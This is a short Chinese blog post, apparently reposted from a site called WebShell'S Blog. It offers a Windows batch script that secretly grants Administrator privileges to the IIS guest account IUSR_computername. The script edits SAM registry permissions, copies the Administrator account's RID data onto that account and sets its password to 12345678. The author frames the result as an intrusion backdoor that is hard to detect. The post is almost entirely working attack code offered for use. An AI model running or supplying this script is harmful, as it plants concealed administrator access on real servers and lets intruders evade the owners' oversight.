网上看了很多复制administator权限帐号的方法或者工具,比如建立admin$,所谓的隐藏帐号。

并复制administrator的权限。

其实这是暂时、一次性隐藏而已,服务器重启一下通过“计算机管理”或者net user

都能看到的。

本批处理根据服务器的情况,结合自己的研究,使用服务器本地iis帐号IUSR_计算机名,

设置密码位12345678(可以自己改一下批处理最后一行)。

这个来复制administrator权限,难以发现与引起怀疑。

(当然其他帐号也可以,用这个帐号主要通过机器名就能知道自己想要的入侵帐号密码是多少)

==================

echo off
setlocal enabledelayedexpansion
echo %computername%
echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername%
rem unicode ->ascii
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem find IUSR_%computername% 的对应id
for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b
del /q "%windir%\..\2.reg"
rem export administrator register
regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
type "%windir%\..\1.reg" >"%windir%\..\2.reg"
del /q "%windir%\..\1.reg"
rem replace 1fx->iusr_id
for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do (
for /f "tokens=*" %%j in ("%%i") do (
set TMP=%%j
set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!"
echo !TMP!>>%windir%\..\1.reg
)
)
regedit /s %windir%\..\1.reg
del /q %windir%\..\1.reg
del /q %windir%\..\2.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg"
regini "%windir%\..\1.reg"
del /q "%windir%\..\1.reg"
net user IUSR_%computername% 12345678

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1014.html